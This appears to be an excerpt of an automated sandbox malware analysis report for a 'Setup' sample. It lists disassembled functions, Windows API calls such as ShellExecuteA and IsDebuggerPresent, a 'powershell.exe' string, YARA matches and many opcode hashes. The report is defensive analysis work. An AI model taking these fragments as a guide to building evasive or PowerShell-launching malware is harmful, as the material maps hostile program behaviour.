                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$CloseFile$FirstNext$MatchPathSpec
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2359873101-0
                                                                                                                                                                                                                                                      • Opcode ID: 25b4a32061fab19c6cdb05d8f37cfa80fdde6cc4a79594e044597a667358f9b0
                                                                                                                                                                                                                                                      • Instruction ID: a727ebb9ab9c2347ab3337a4b19c30f611918a666a6a74f81f6a30f4577606a0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25b4a32061fab19c6cdb05d8f37cfa80fdde6cc4a79594e044597a667358f9b0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F19E71D00259DFCB25DBA4C858BEDBBB9BF09304F1841E9E459AB281DB705B85CFA0
                                                                                                                                                                                                                                                      Function 0319E440 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 629COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionFolderPathUser
                                                                                                                                                                                                                                                      • String ID: )$-$powershell.exe$type must be number, but is
                                                                                                                                                                                                                                                      • API String ID: 3583530794-3753438943
                                                                                                                                                                                                                                                      • Opcode ID: e760cc1620ebe817ba4eccbe7993aa36c7613de2fcaa97fb4e899338c34f6c33
                                                                                                                                                                                                                                                      • Instruction ID: 215137711f42ec729010e1d146729b702d19e7267c51b8123f617a52520e2d56
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e760cc1620ebe817ba4eccbe7993aa36c7613de2fcaa97fb4e899338c34f6c33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D626B30D04298DBEF15EB64CD547DDBBB0AF5A304F2481CAD1482B292DBB51B89CF92
                                                                                                                                                                                                                                                      Function 031DC129 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 031DC1C2
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 031DC1EB
                                                                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 031DC200
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                      • Opcode ID: 4f2c8e8f33a99298d0d6b9c89247ef5998cce5591f2a1afe10318cdeeb151769
                                                                                                                                                                                                                                                      • Instruction ID: ac0eebde6541bd05e1bb23d0f8fe7949b91f65692bc86c765991b7c706aa1689
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f2c8e8f33a99298d0d6b9c89247ef5998cce5591f2a1afe10318cdeeb151769
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED215836640125E7EB38DF58CD01A97B3AAAF4EB50B5F4D64E90AD7114E732D981C3D0
                                                                                                                                                                                                                                                      Function 031A0200 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 1686COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskFolderPath
                                                                                                                                                                                                                                                      • String ID: J
                                                                                                                                                                                                                                                      • API String ID: 1258877742-1141589763
                                                                                                                                                                                                                                                      • Opcode ID: 32ef1024aa3720467ee44884f8ac7d4b360ba4ef5fc31d2789bdeedd97ccecd7
                                                                                                                                                                                                                                                      • Instruction ID: fdc997ccd32cff2ca56a9b81277a92a4bb557b88a736adad9f2be896f18e2e32
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32ef1024aa3720467ee44884f8ac7d4b360ba4ef5fc31d2789bdeedd97ccecd7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5134670C053A89BDB21EB64CD547EDBBB0AF59308F2042C9D5582B292DBB51BC8CF95
                                                                                                                                                                                                                                                      Function 031DC305 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 031DC40D
                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 031DC44B
                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 031DC45E
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 031DC4A6
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 031DC4C1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                                                      • Opcode ID: 5fdf2c8188dabb7ea167a2533fd6c79021c5c617d36ecddb60a91db3d1da7bf4
                                                                                                                                                                                                                                                      • Instruction ID: 1e5cf253026be2f3b0ee662e23407c9794a609c01922a840edf51e4c4bb506ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fdf2c8188dabb7ea167a2533fd6c79021c5c617d36ecddb60a91db3d1da7bf4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC517475A00215AFDF14EFA9DC84ABEB3B8BF4E700F094925E911EB190D7709944CBA0
                                                                                                                                                                                                                                                      Function 031A20C0 Relevance: 7.6, APIs: 5, Instructions: 148comCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 031A210D
                                                                                                                                                                                                                                                      • CoCreateInstance.COMBASE(031ED1E0,00000000,00000001,031ED1C0,?), ref: 031A2128
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 031A2182
                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE ref: 031A220A
                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE ref: 031A2276
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Uninitialize$ByteCharCreateInitializeInstanceMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4150283-0
                                                                                                                                                                                                                                                      • Opcode ID: 59e51538a79588ef9ae4dc760c56a2c09a5073e49824eb14ba45823843057aad
                                                                                                                                                                                                                                                      • Instruction ID: 99fcd115cae5f6d42ddccbf2b4cfc72257462cb8ecc0a515bc3c107f1e0c3603
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59e51538a79588ef9ae4dc760c56a2c09a5073e49824eb14ba45823843057aad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F518275A00619DFCB18DF94DC44BADB7B9EF4D704F000199E6099B2A0DB726E81CFA5
                                                                                                                                                                                                                                                      Function 0319E240 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,031F6F48,?,00000000,00000000,00000000), ref: 0319E3F1
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1CF
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1F1
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E210
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E226
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseConcurrency::cancel_current_taskCreateExecuteHandlePointerShellWrite
                                                                                                                                                                                                                                                      • String ID: -$powershell.exe$type must be number, but is
                                                                                                                                                                                                                                                      • API String ID: 503567120-4150588111
                                                                                                                                                                                                                                                      • Opcode ID: 57a6b6885ed667af2063384b89314826bc4373cef484bf69e3f9d2d4860039c3
                                                                                                                                                                                                                                                      • Instruction ID: 1c60c765b9db3c69e56c5d0e1ee9bf91b80a617c122d9250e114579519b9b61d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57a6b6885ed667af2063384b89314826bc4373cef484bf69e3f9d2d4860039c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0722A030D00398DFEF11EBA4C954BDDBBB1AF59304F24829AD4056B281EB755A89CFA1
                                                                                                                                                                                                                                                      Function 031C84B0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 51f56c8a706c4c2995a9b19c15f5606495a590284d04ad7f6333c41a5ced18d5
                                                                                                                                                                                                                                                      • Instruction ID: 5b428b1e3a8595b350d1665d8838615d351fe36b3232c1ab3e011d2b6cfa6a29
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51f56c8a706c4c2995a9b19c15f5606495a590284d04ad7f6333c41a5ced18d5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E024B71E102599BDF14CFA9C8C06AEFBB5FF98314F29826DD519AB340D731AA418B90
                                                                                                                                                                                                                                                      Function 02D79C94 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 55fd2cb6fd69b7c20b0acb75fc0c464944f2818f61bddf13411a0be40e06c056
                                                                                                                                                                                                                                                      • Instruction ID: 9ede1985992358740b7058bc92ddd066b1557e7d0f3cdab0a51770b980f5e4eb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55fd2cb6fd69b7c20b0acb75fc0c464944f2818f61bddf13411a0be40e06c056
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8021A72E012199BDF14CFA9C9906AEFBF1FF48314F248269D915A7384E735AE41CB90
                                                                                                                                                                                                                                                      Function 031A7EE1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 031A7EED
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 031A7FB9
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 031A7FD2
                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 031A7FDC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                                      • Opcode ID: ea7f0c908c7378ac17f25fee5838c07f2d8a6c734928c5f5e7c33e6d2f958fbc
                                                                                                                                                                                                                                                      • Instruction ID: 1fe77ae743a4d74b8ba425a6cd14b067c891471ad5eedadace1dc651242690dc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea7f0c908c7378ac17f25fee5838c07f2d8a6c734928c5f5e7c33e6d2f958fbc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D831D979D05318DBDB21EFA4DD49BCDBBB8AF08300F1041AAE40CAB250EB759B858F55
                                                                                                                                                                                                                                                      Function 031DBDA0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBDF4
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBE3E
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBF04
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                                                      • Opcode ID: 57ea1ec4fb303de6307fe94eb7a505aed108d8679f61eba5cb1bd48df884a67d
                                                                                                                                                                                                                                                      • Instruction ID: 56b6d2fae06f3cd90aa13f852207158a723ef4c0d182b05593aa0e0ddd95d88d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57ea1ec4fb303de6307fe94eb7a505aed108d8679f61eba5cb1bd48df884a67d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6561A0755142179FDB28DF68CC81BBAB3A8EF0D300F1981AAE916CA584E774DA91CF50
                                                                                                                                                                                                                                                      Function 031CBEAD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 031CBFA5
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 031CBFAF
                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(031C37AD,?,?,?,?,?,00000000), ref: 031CBFBC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b888a3c6be89046fe39eb6e66181ee38a32d786b348e84ca5a1994c24de2af7
                                                                                                                                                                                                                                                      • Instruction ID: 42bc3ed0ff2d6c5ced2812a447aafb677c507cba47f3826456d970e9b8102e1e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b888a3c6be89046fe39eb6e66181ee38a32d786b348e84ca5a1994c24de2af7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7631D474911318ABCB21DF68DD89B8CBBB8BF1C310F5081DAE41CAB250E7709B858F45
                                                                                                                                                                                                                                                      Function 02D33864 Relevance: 4.4, Strings: 3, Instructions: 605COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: !$LiH$PiH
                                                                                                                                                                                                                                                      • API String ID: 118556049-1169732448
                                                                                                                                                                                                                                                      • Opcode ID: d4085636677a430a2b278b361d70e92a2aad454a3a29ff43aa0af1643b514362
                                                                                                                                                                                                                                                      • Instruction ID: 6cca020ee68de35bc81e92a9960dc75a9eeb1f55be831f8080d4665ad38f9e34
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4085636677a430a2b278b361d70e92a2aad454a3a29ff43aa0af1643b514362
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3427C70D012989ADF22EF64C948BEDBBB1EF25304F1042D9D44967291EBB55F88CFA1
                                                                                                                                                                                                                                                      Function 031909F3 Relevance: 4.3, Strings: 3, Instructions: 532COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: N$array$object
                                                                                                                                                                                                                                                      • API String ID: 0-364997817
                                                                                                                                                                                                                                                      • Opcode ID: 787e76297e434bf01ec51f06bf580b2d4d4318eb5188ca16542748522a8b9f96
                                                                                                                                                                                                                                                      • Instruction ID: f7fdca7e420de7d06297bd111ef852bb54ac1ea0ecfdb6b56846a26fff829476
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 787e76297e434bf01ec51f06bf580b2d4d4318eb5188ca16542748522a8b9f96
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F22B535D0024DEFEF04EBA8C954BEDBB74BF1D300F5441AAD506AB281EB706A58CB95
                                                                                                                                                                                                                                                      Function 03191793 Relevance: 4.3, Strings: 3, Instructions: 531COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: R$array$object
                                                                                                                                                                                                                                                      • API String ID: 0-1502003704
                                                                                                                                                                                                                                                      • Opcode ID: cccb89970fe8659ac53337a73a2ae87f2283b0eba808f4d084274f4cafc97ca5
                                                                                                                                                                                                                                                      • Instruction ID: 8f6678f0aa80128f9be03c2eb4b9c4ad1de2d26222baca5b7ae0e4eb2ab90dd1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cccb89970fe8659ac53337a73a2ae87f2283b0eba808f4d084274f4cafc97ca5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79229674D0034DDFEF14EBA8C954BEEBBB4AF19300F14455AD456AB281EB706B48CB91
                                                                                                                                                                                                                                                      Function 02D2B404 Relevance: 4.1, Strings: 3, Instructions: 335COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ?$@PI$D
                                                                                                                                                                                                                                                      • API String ID: 0-865519726
                                                                                                                                                                                                                                                      • Opcode ID: 860aa3514ad5d7a0c712882d6621d68f29c01d353dfd24237edb7b1476158743
                                                                                                                                                                                                                                                      • Instruction ID: 6c2c090be30f71198d31f46b9f10d7054a5d415b675c255bdfc960386816a8b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 860aa3514ad5d7a0c712882d6621d68f29c01d353dfd24237edb7b1476158743
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73026970C106A8CADB25DF64CD44BD9B7B0BF5A308F1082DAD44867291EBB45AC8CFA1
                                                                                                                                                                                                                                                      Function 031A2480 Relevance: 3.7, APIs: 2, Instructions: 710COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(00000000,?), ref: 031A264F
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,031F73F8,00000001,?,?,031F73F4,00000003), ref: 031A2ACE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MatchPathSpec
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3588000350-0
                                                                                                                                                                                                                                                      • Opcode ID: 13c3d46bb39e361882e85a25241d195e0f643217ca3d908c5bee8393d6f06287
                                                                                                                                                                                                                                                      • Instruction ID: 0b7da8d4ec53e6902d2d9921f4ef959e3682f5c2739a3073f91ce57db6e6afae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13c3d46bb39e361882e85a25241d195e0f643217ca3d908c5bee8393d6f06287
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F172A974C006589FDB24DF28CC58BEDBBB5AF5A304F1482C9D4186B2A1DB719B89CF90
                                                                                                                                                                                                                                                      Function 03198CD0 Relevance: 3.0, Strings: 2, Instructions: 518COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @$i-8
                                                                                                                                                                                                                                                      • API String ID: 0-541822905
                                                                                                                                                                                                                                                      • Opcode ID: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
                                                                                                                                                                                                                                                      • Instruction ID: 4b797e817dc1c482353f5341eefb348d9d936053b82bab2c1309616ffcdc6119
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54125B76909210AFD718CF28C84486FF7E6BFCC314F0A8A1DF899A7250D771E9548B96
                                                                                                                                                                                                                                                      Function 02D4A4B4 Relevance: 3.0, Strings: 2, Instructions: 518COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @$i-8
                                                                                                                                                                                                                                                      • API String ID: 0-541822905
                                                                                                                                                                                                                                                      • Opcode ID: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
                                                                                                                                                                                                                                                      • Instruction ID: 29370fe0128e1774028f77c5d2704a5bfc5614a79623d4fde39b1a2a45f8340b
